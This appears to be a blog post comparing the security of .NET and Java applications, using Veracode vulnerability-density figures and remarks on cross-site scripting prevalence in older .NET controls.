Interesting question – eh? There is a great amount of passion on both sides of the argument. Beyond the emotion and hype, what’s the reality?
After Microsoft followed Java’s lead and adopted an interpreted byte code model (common language runtime) for .NET, our official position has been that in the hands of a skilled developer, both languages can be used to produce equally secure applications.
I had a client ask me this question last week, so I went looking for the latest data to back this up.
Veracode is an application security testing solution provider that scans binaries, byte code and web applications as a service. They keep track of the aggregated data of the applications they scan and have recently begun publishing reports on the overall security of the code their service analyzes. Since they support both .NET and Java byte code scanning, I went to them for some specific data.
This wasn’t published in their report (they are looking at adding this in the next revision), but this is what their data shows: the vulnerability density (average flaws per MB of code scanned) for .NET was 27.2 and for Java the overall density was 30.0.
To me, these are close enough and likely within the sampling error of their data. The security of .NET and Java code should be considered equivalent. What is interesting is that the prevalence of the types of vulnerabilities found in .NET code is different than the types of vulnerabilities found in Java code. This table comes from the published report:
This is useful data when designing training for .NET and Java developers. For both types of developers, an emphasis should be placed on avoiding cross-site scripting errors. Veracode attributes the higher frequency of cross-site scripting vulnerabilities in .NET applications to the use of older .NET controls that do not automatically encode output. If you are using .NET, make sure you are using the newer sets of controls.
Bottom Line: the perceived security (or lack thereof) between .NET and Java isn’t a reason to select one language and framework over the other.